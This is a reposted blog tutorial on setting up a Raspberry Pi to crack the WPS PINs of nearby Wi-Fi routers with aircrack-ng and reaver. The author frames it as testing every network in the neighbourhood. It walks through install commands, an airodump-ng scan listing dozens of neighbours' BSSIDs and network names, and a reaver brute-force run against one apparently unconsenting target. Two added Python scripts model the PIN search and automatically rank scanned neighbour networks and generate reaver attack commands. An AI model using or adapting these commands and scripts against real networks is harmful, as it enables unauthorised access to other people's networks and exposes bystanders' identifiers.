Saw a lot of good articles on freebuf; reposting all kinds of them to keep for later use.
Editor's note: thanks to minyoni for sharing. freebuf hopes to see more papers like this that cover the whole process from installation to security testing, so that domestic security write-ups become as detailed and professional as those abroad. Disclaimer: this article is for security study purposes only.

Recently I got the urge to test every wireless network in my neighbourhood. Since most routers today support WPS, everyone surely knows aircrack-ng and reaver, the two tools that make cracking the WPS PIN the must-have remedy for home and travel. Running a brute-force tool like reaver used to mean leaving a host switched on for 24 hours: a waste of power, not green, not eco-friendly! The Raspberry Pi, on the other hand, makes a rather capable attack platform, and enthusiasts abroad have already built a purpose-made network attack and testing system (Debian-based) for the board.

This article, though, is about installing aircrack-ng and reaver on the official Raspberry Pi distribution. I power the Pi from an Apple charger over a mini USB cable, and a single Alfa wireless adapter is enough. With power draw that low, it is an excellent setup for running the PIN attack online and for long-running wireless capture. PS: if you already know all this, feel free to skip ahead...

Enough chatter; the install goes as follows.

1. Prepare the system environment
apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tshark subversion
2. Install aircrack-ng (the svn trunk URL below dates from 2012; aircrack-ng has since moved to git at github.com/aircrack-ng/aircrack-ng)
svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng/
make
make install
cd ../
3. Install reaver (Google Code, where reaver 1.4 was hosted, shut down in 2016; the maintained code today is the reaver-wps-fork-t6x fork on GitHub)
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
tar zxvf reaver-1.4.tar.gz
cd reaver-1.4/src
./configure
make
make install
cd ../
4. Use aircrack-ng to survey the routers around you (evil, I know... hehe). airmon-ng puts the Alfa card into monitor mode as mon0 (newer aircrack-ng releases name it wlan0mon instead) and airodump-ng lists every AP it hears. Note that this default airodump-ng view says nothing about WPS: to see which of these APs actually advertise WPS, and whether WPS is currently locked, run wash -i mon0, the scanner that ships with reaver.
airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46

BSSID               PWR  Beacons #Data,  #/s  CH  MB    ENC   CIPHER  AUTH  ESSID
00:0E:2E:FD:C4:BB    -1        0      0    0  -1  -1                        <length: 0>
4C:E6:76:60:3F:20   -13      123      0    0  11  54e   WPA2  CCMP    PSK   cuier-1
B0:48:7A:52:F4:72   -23       42      0    0   1  54e.  WPA2  CCMP    PSK   FAST_52F472
8C:21:0A:5F:A2:FA   -35       28      0    0   1  54e.  WPA2  CCMP    PSK   TP-LINK_5FA2FA
E0:05:C5:D3:3F:00   -42       33      0    0   2  54e.  WPA2  CCMP    PSK   TP-LINK_D33F00
EC:17:2F:7D:12:1E   -49       56      1    0   6  54e.  WPA2  CCMP    PSK   wg7788
B0:48:7A:5D:22:EA   -51       36      0    0   6  54e.  WPA2  CCMP    PSK   TP-LINK_1202
C4:CA:D9:6D:6F:B0   -52       30     10    0  11  54e.  OPN                 ChinaNet
8C:21:0A:8F:2F:1A   -54       18      0    0   1  54e.  WPA2  CCMP    PSK   hechengyv
E0:05:C5:C5:70:E8   -55       15      0    0   4  54e.  WPA2  CCMP    PSK   wtangqiu
C8:3A:35:55:D1:D8   -55       20      2    0   7  54e.  WPA   CCMP    PSK   Tenda_55D1D8
8C:21:0A:84:89:8C   -56       24      0    0   1  54e.  WPA2  CCMP    PSK   BATE
C4:CA:D9:6D:5F:60   -55       15      2    0   6  54e.  OPN                 ChinaNet
EC:17:2F:54:01:2E   -56       13      0    0   1  54e.  WPA2  CCMP    PSK   diguadawang
5C:63:BF:74:56:52   -53       18      2    0   1  54e.  WPA2  CCMP    PSK   cocohe
08:10:76:40:C2:92   -58       21      0    0   1  54e   WPA2  CCMP    PSK   flytv
E0:05:C5:C0:60:42   -56       21      0    0   9  54e.  WPA2  CCMP    PSK   HZLYL
38:83:45:C1:BE:F8   -59       14      1    0   6  54e.  WPA2  CCMP    PSK   TICO081122
C4:CA:D9:74:B3:80   -57       13      1    0  11  54e.  OPN                 ChinaNet
EC:88:8F:AB:F6:5E   -59        5      0    0   4  54e.  WPA2  CCMP    PSK   TP-LINK_ABF65E
6C:E8:73:B0:67:78   -59        8      0    0   6  54e.  WPA2  CCMP    PSK   WJJ~LOVE~WW
C8:3A:35:19:D6:78   -61        9      0    0   1  54e   WPA   CCMP    PSK   Tenda_19D678
E0:05:C5:19:9C:04   -61       18      0    0   7  54 .  WPA2  CCMP    PSK   1-14-1-602
C8:64:C7:5A:46:16   -60        3      0    0  11  54e   WPA   CCMP    PSK   STB_CDCF
6C:E8:73:45:A7:E6   -60        6      0    0   4  54e.  WPA2  CCMP    PSK   TP-LINK_45A7E6
1C:BD:B9:F5:E5:D7   -61       16      0    0   1  54    WPA2  CCMP    PSK   D-Link_DIR-600M
C4:CA:D9:6D:6E:B0   -61       12      0    0   1  54e.  OPN                 ChinaNet
C8:64:C7:5A:46:15   -61       17      0    0  11  54e   WPA   CCMP    PSK   VIDEOPHONE_CDCF
C8:64:C7:5A:46:17   -61       12      0    0  11  54e   WPA   CCMP    PSK   BACKUP
EC:88:8F:99:75:F2   -61        5      0    0   4  54e.  WPA2  CCMP    PSK   6786
8C:21:0A:1E:60:26   -61        3      0    0   1  54e.  WPA2  CCMP    PSK   yue
00:23:CD:5B:A7:9E   -61        2      0    0   6  54 .  WEP   WEP           1203 wireless
14:E6:E4:44:9B:8E   -62        6      0    0   4  54e.  WPA2  CCMP    PSK   bujiankai
00:1D:0F:81:72:06   -62        4      0    0   6  54 .  WEP   WEP           Line
FC:C8:97:94:B6:C8   -62        7      0    0  11  54e   WPA   CCMP    PSK   CU_6cmn
B0:48:7A:2A:1B:E6   -62        7      0    0   6  54e.  WPA   CCMP    PSK   302
EC:88:8F:8F:CD:BB   -62       11      0    0  11  54e.  WPA2  CCMP    PSK   haloso2
EC:17:2F:AC:44:A2   -62        7      0    0   1  54e.  WPA2  CCMP    PSK   1-401
C8:64:C7:5A:46:14   -63       24      0    0  11  54e   WPA   CCMP    PSK   CU_CDCF
38:83:45:B5:E3:96   -63        6      0    0   1  54e.  WPA2  CCMP    PSK   TP-LINK_B5E396
C8:3A:35:2B:35:68   -63       11      0    0  11  54e   WPA2  CCMP    PSK   Tenda_2B3568
00:27:19:6D:4A:5A   -63        1      0    0  11  54e.  WPA2  CCMP    PSK   JUJIA-FOGUANG
FC:C8:97:94:B6:CB   -65        9      0    0  11  54e   WPA   CCMP    PSK   BACKUP
FC:C8:97:94:B6:C9   -63       15      0    0  11  54e   WPA   CCMP    PSK   VIDEOPHONE_6cmn
C8:3A:35:06:63:B0   -64        3      0    0   1  54e   WPA2  CCMP    PSK   Tenda_0663B0
8C:21:0A:B0:22:92   -64        3      0    0   1  54e.  WPA2  CCMP    PSK   810
14:E6:E4:4F:DE:FE   -64        3      0    0   1  54e.  WPA2  CCMP    PSK   YM+ZM
FC:C8:97:94:B6:CA   -65       13      0    0  11  54e   WPA   CCMP    PSK   STB_6cmn
C8:3A:35:52:70:60   -65        2      0    0  11  54e.  WPA   CCMP    PSK   Tenda_527060
00:26:5A:B3:08:7E   -65        8      0    0  13  54e   WPA2  CCMP    PSK   503
F4:EC:38:56:6B:DE   -62        2      0    0   9  54e.  WPA2  CCMP    PSK   WTO
14:D6:4D:A0:19:60   -62        3      0    0  11  54e   WPA2  TKIP    PSK   wang~XB
C4:CA:D9:6D:6F:40   -62        1      0    0   1  54e.  OPN                 ChinaNet
Ctrl+C to stop.
There really are a lot of wireless networks in this neighbourhood... mostly thanks to the Alfa card, hehe.

5. Use reaver to crack the password of a WPS-enabled router. Take this one, for example; the signal is decent:

8C:21:0A:5F:A2:FA   -35       28      0    0   1  54e.  WPA2  CCMP    PSK   TP-LINK_5FA2FA
root@home:~/soft/reaver-1.4# reaver -i mon0 -b 8C:21:0A:5F:A2:FA -a -S -vv -d2 -t 5 -c 1
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 8C:21:0A:5F:A2:FA
[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 11115670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C
And that is the attack running; just wait patiently for the result... don't be too evil. Testing is fine, but be a good kid... In this log every attempt ends with a WSC NACK straight after M4, which means the first four digits of the guessed PIN were wrong; once reaver receives an M5 instead, the first half is known and only the last four digits (three free digits plus a checksum) remain.
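The log above ends every attempt with a NACK after M4. To show why that makes the PIN recoverable in at most 11,000 handshakes rather than 10^7, here is an added example that is not code from the post or from reaver: a toy enrollee that checks the two PIN halves the way WPS does (first half at M4/M5, second half at M6/M7), plus the PIN checksum that fixes the eighth digit. The four PINs reaver tries first in the log (12345670, 00005678, 01235678, 11115670) all pass that checksum. The real protocol proves each half with HMAC commitments over a Diffie-Hellman secret; the plain digit comparison, the secret PIN and the attempt counters here are constructed for illustration.

```python
"""Toy model of the WPS registrar exchange reaver drives (added example)."""
from typing import Optional, Tuple


def wps_checksum(first7: int) -> int:
    """Checksum digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the seven
    leading digits, chosen so the weighted sum plus the digit is 0 mod 10."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def full_pin(first7: int) -> str:
    """8-digit PIN string for the seven leading digits (zero-padded)."""
    return f"{first7:07d}{wps_checksum(first7)}"


class ToyAP:
    """Enrollee holding the PIN (constructed stand-in for the real AP).

    Replies to M4 with M5 only when the guessed first half matches, and to
    M6 with M7 only when the second half matches; otherwise a WSC NACK,
    which is exactly the pattern printed in the reaver log above."""

    def __init__(self, pin: str) -> None:
        if len(pin) != 8 or full_pin(int(pin[:7])) != pin:
            raise ValueError("not a valid WPS PIN")
        self.half1, self.half2 = pin[:4], pin[4:]
        self.m4_seen = 0
        self.m6_seen = 0

    def m4(self, guess_half1: str) -> str:
        self.m4_seen += 1
        return "M5" if guess_half1 == self.half1 else "NACK"

    def m6(self, guess_half2: str) -> str:
        self.m6_seen += 1
        return "M7" if guess_half2 == self.half2 else "NACK"


def recover_pin(ap: ToyAP) -> Tuple[Optional[str], int]:
    """Reaver's search order: 10^4 first halves, then 10^3 second halves
    (the eighth digit is a checksum, so only three of the last four are
    free). Returns (pin, attempts); attempts counts every handshake started."""
    attempts = 0
    half1 = None
    for i in range(10_000):
        attempts += 1
        if ap.m4(f"{i:04d}") == "M5":
            half1 = f"{i:04d}"
            break
    if half1 is None:
        return None, attempts
    for j in range(1_000):
        attempts += 1
        first7 = int(f"{half1}{j:03d}")
        half2 = f"{j:03d}{wps_checksum(first7)}"
        # Each retry replays M1-M4 with the known first half before M6.
        if ap.m4(half1) == "M5" and ap.m6(half2) == "M7":
            return half1 + half2, attempts
    return None, attempts


# Worst case: 10^4 + 10^3 handshakes, versus 10^7 if the whole PIN were checked at once.
MAX_ATTEMPTS = 10_000 + 1_000


if __name__ == "__main__":
    pin, n = recover_pin(ToyAP("12345670"))
    print(f"recovered {pin} after {n} handshakes (worst case {MAX_ATTEMPTS})")
```

With the delays from the tips section (-d2 -t 5) each handshake costs a few seconds, so the worst case is measured in hours, not years; that is the whole reason a low-power board is enough for this job.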
##########################################################################
Some tips on tuning reaver's parameters:
-i the monitor-mode interface name
-b the target's MAC address (BSSID)
-a auto-detect the best advanced options for the target AP
-S use small DH keys (speeds up the crack)
-vv display more non-critical warnings
-d delay: idle time between attempts, default 1 second
-t timeout: maximum time to wait for the AP's reply on each attempt, default 5 seconds
-c specify the channel so the signal is found quickly, e.g. -c1 for channel 1; check your target's channel and adjust accordingly (for non-TP-LINK routers, -d9 -t9 is recommended to keep the router from locking up:
Example:
reaver -i mon0 -b MAC -a -S -d9 -t9 -vv)
Adjust the parameters to the situation (the examples below assume the target is on channel 1):
Very good signal: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
Average signal: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
Weak signal: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
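To put the scan from step 4 together with the tiers above, here is an added example that is not code from the post or from the aircrack-ng and reaver projects. It parses the airodump-ng screen output as pasted above (a constructed sample of its rows is embedded), keeps the WPA/WPA2-PSK networks (a recovered WPS PIN yields the PSK; OPN networks have no key and WEP is a different attack), ranks them by PWR and builds a reaver command line with the channel and the delay flags for that signal tier. The -30 and -55 dBm thresholds and the optional wps_bssids filter are my assumptions, not the post's; fill the filter from wash -i mon0, since airodump-ng's default view does not show WPS.

```python
"""Rank airodump-ng scan rows and build reaver command lines (added example)."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Constructed sample: the header and seven rows copied from the scan above.
SAMPLE_SCAN = """\
BSSID               PWR  Beacons #Data,  #/s  CH  MB    ENC   CIPHER  AUTH  ESSID
00:0E:2E:FD:C4:BB    -1        0      0    0  -1  -1                        <length: 0>
4C:E6:76:60:3F:20   -13      123      0    0  11  54e   WPA2  CCMP    PSK   cuier-1
8C:21:0A:5F:A2:FA   -35       28      0    0   1  54e.  WPA2  CCMP    PSK   TP-LINK_5FA2FA
C4:CA:D9:6D:6F:B0   -52       30     10    0  11  54e.  OPN                 ChinaNet
C8:3A:35:55:D1:D8   -55       20      2    0   7  54e.  WPA   CCMP    PSK   Tenda_55D1D8
00:23:CD:5B:A7:9E   -61        2      0    0   6  54 .  WEP   WEP           1203 wireless
14:D6:4D:A0:19:60   -62        3      0    0  11  54e   WPA2  TKIP    PSK   wang~XB
"""

# One airodump-ng AP row. MB looks like "54e", "54e.", "54 ." or "54"; CIPHER
# and AUTH are blank for OPN, AUTH is blank for WEP, and ESSIDs may contain spaces.
ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+"
    r"(?P<pwr>-?\d+)\s+(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<rate>\d+)\s+"
    r"(?P<ch>-?\d+)\s+(?P<mb>-?\d+e?(?: ?\.)?)\s+"
    r"(?P<enc>WPA2|WPA|WEP|OPN)\s+"
    r"(?:(?P<cipher>CCMP|TKIP|WEP)\s+)?"
    r"(?:(?P<auth>PSK|MGT)\s+)?"
    r"(?P<essid>\S.*?)\s*$"
)


@dataclass
class AccessPoint:
    bssid: str
    pwr: int
    channel: int
    enc: str
    cipher: Optional[str]
    auth: Optional[str]
    essid: str


def parse_scan(text: str) -> List[AccessPoint]:
    """Rows that do not match, such as the PWR -1 / <length: 0> hidden entry
    with no ENC column, are skipped; they are not usable targets anyway."""
    aps = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            aps.append(AccessPoint(m["bssid"], int(m["pwr"]), int(m["ch"]),
                                   m["enc"], m["cipher"], m["auth"], m["essid"]))
    return aps


def candidates(aps: Iterable[AccessPoint],
               wps_bssids: Optional[Set[str]] = None) -> List[AccessPoint]:
    """WPA/WPA2-PSK networks, strongest signal first. Pass the BSSIDs that
    wash reported as advertising WPS to drop everything else (assumed input)."""
    keep = [ap for ap in aps if ap.enc in ("WPA", "WPA2") and ap.auth == "PSK"]
    if wps_bssids is not None:
        keep = [ap for ap in keep if ap.bssid in wps_bssids]
    return sorted(keep, key=lambda ap: ap.pwr, reverse=True)


def delay_flags(pwr: int) -> str:
    """Delay tiers from the tips section; the dBm cut-offs are an assumption."""
    if pwr >= -30:
        return "-d0"
    if pwr >= -55:
        return "-d2 -t 5"
    return "-d5"


def reaver_command(ap: AccessPoint, iface: str = "mon0") -> str:
    return f"reaver -i {iface} -b {ap.bssid} -a -S -vv {delay_flags(ap.pwr)} -c {ap.channel}"


if __name__ == "__main__":
    for ap in candidates(parse_scan(SAMPLE_SCAN)):
        print(f"{ap.pwr:4d} dBm  {ap.essid:16} {reaver_command(ap)}")
```

For a long unattended run, write the scan with airodump-ng -w <prefix> --output-format csv and parse that file instead of the screen dump; the regex above is tied to the on-screen column layout.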